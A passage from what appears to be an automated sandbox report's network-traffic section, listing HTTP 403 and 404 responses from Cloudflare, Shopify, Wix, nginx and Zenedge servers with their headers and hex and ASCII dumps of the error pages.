63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 5fad1793-28f7-4562-855c-173976a2500bCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q%2BxAYb%2BEfkIRwA0E2hVRwGEJHic0im9s%2Fo82zc7gOZ%2FN6UGKaC8RSPpGE%2B1bRvcBbqldQkZd%2BukjSk0yaDxmgorm5SCC0Cn0V5YRsnY12bRIwNhgR0eX5gbRjeGv5Ig%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=65.000057Server: cloudflareCF-RAY: 806e7538db8441b2-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=24X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: a18e1caa-3799-411e-a919-bb97b091afa8CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kKp25GveMUpXi32NLZ6o1IfI%2Fzl1cb8zaKbbZmmzFHJbZEOpkinWOKmL%2B0vv42KWBR4snWtYcdbKy0Vwyh0cKhn8%2BpQaJoJ2lutKyCA1zfJ0hMWLZmZtQYp55X2ZcIKx6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=73.999882Server: cloudflareCF-RAY: 806e753bcdbec33b-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: X-Zen-Fury: fcfb18101b134ce1f295036b01f29e9cdfd817f1Server: ZENEDGEDate: Fri, 15 Sep 2023 05:26:59 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 37 32 30 37 22 2c 20 31 36 39 34 37 35 35 35 37 32 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 34 37 35 35 35 37 32 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 34 34 30 30 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 31 35 20 53 65 70 20 32 30 32 33 20 30 35 3a 32 38 3a 35 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC7207", 1694755572, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1694755572 * 3.1415926535898; v = Math.floor(v); do
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:00 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RTHkhDSqnZ60J7FFKpaumUhw%2F8AiBRj2N3ArVgRDV1Pg6ZdmBlC1TuOlTDJ4usmeJKyDJzRf2eBGaKR%2Fm3QX8JdAVMvDlLRLDrMjL54UhrGH9iwIAB48B7xBbL0QKLlb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7542ec0f42ea-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:00 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JjHCKVoyl39EMrm7UCn%2FV5MdKSNTrkpdNXzqwmpTvBkQ1YgbyuveWW94OjgJeMOX1XsF7O7JBRkjv1uDWKlrwttRoAhzWhPKO2i6Cs5icuuf0%2BMpzhqK8sXmqv%2F%2F5JCY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e75438c6642ea-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:00 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:27:17 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ry46hCShnwlrhyUKsEU9wOKD67qn9GBq43Ng1w%2FNeJmRVq81D2iwIc6z3KxnaUkXk5xMua2TKfN8vyIZlls%2BptqdDx3yKO%2BL02jYvjqgOtclizsUDOLgV0lcQ%2F7RSk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e755168cc8cee-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv=
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:10 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1694755631.644764075056338390X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 15 Sep 2023 05:27:11 GMTX-Served-By: cache-iad-kcgs7200046-IADX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqe0L1PnLg6FLWqrGNmqNwAa0sM5c8dDUFHeNaFq0qDuVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:27:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nYM%2FYGCnBHZp9icvdSY2qUMvLY%2FxgbzUEWf0JQZQmRqxwPOXdNiS9us3pnkOOJHacwMoB4yW9S%2BYwqEHHfnkP0Eg9Xkq6ZbCp0rzrzTTfhPc0WRJF%2BDCdHvsg0xSFicX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7589fe3f0c92-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 